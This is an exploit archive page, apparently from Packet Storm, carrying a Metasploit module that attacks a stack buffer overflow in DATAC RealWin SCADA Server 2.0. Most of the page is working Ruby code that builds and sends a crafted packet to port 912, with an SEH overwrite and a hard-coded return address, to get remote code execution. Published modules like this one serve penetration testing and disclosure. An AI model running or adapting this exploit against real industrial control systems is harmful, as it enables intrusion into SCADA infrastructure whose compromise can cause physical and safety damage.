what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DATAC RealWin SCADA Server SCPC_SCPC_INITIALIZE Buffer Overflow

DATAC RealWin SCADA Server SCPC_SCPC_INITIALIZE Buffer Overflow
Posted Oct 19, 2010
Authored by Luigi Auriemma, MC | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). By sending a specially crafted packet, an attacker may be able to execute arbitrary code.

tags | exploit, overflow, arbitrary
SHA-256 | 6cf335d7a911baa5a781d9110c547c3f8feb4e5400dc4f0212b17723f78da7c3

DATAC RealWin SCADA Server SCPC_SCPC_INITIALIZE Buffer Overflow

Change Mirror Download
##
# $Id: realwin_scpc_initialize.rb 10734 2010-10-18 21:20:02Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = GreatRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'DATAC RealWin SCADA Server SCPC_SCPC_INITIALIZE Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in DATAC Control
International RealWin SCADA Server 2.0 (Build 6.1.8.10).
By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
},
'Author' => [ 'Luigi Auriemma', 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10734 $',
'References' =>
[
[ 'URL', 'http://aluigi.altervista.org/adv/realwin_1-adv.txt' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 550,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Universal', { 'Ret' => 0x4002da21 } ], # FlexMLang.DLL 8.1.45.19
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 15 2010'))

register_options([Opt::RPORT(912)], self.class)
end

def exploit

connect

data = [0x6a541264].pack('V')
data << [0x00000002].pack('V')
data << [0x00001ff4].pack('V')
data << "\xff\x7f"
data << rand_text_alpha_upper(226)
data << generate_seh_payload(target.ret)
data << rand_text_alpha_upper(10024 - payload.encoded.length)
data << "\x00"

print_status("Trying target #{target.name}...")
sock.put(data)

handler
disconnect

end

end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close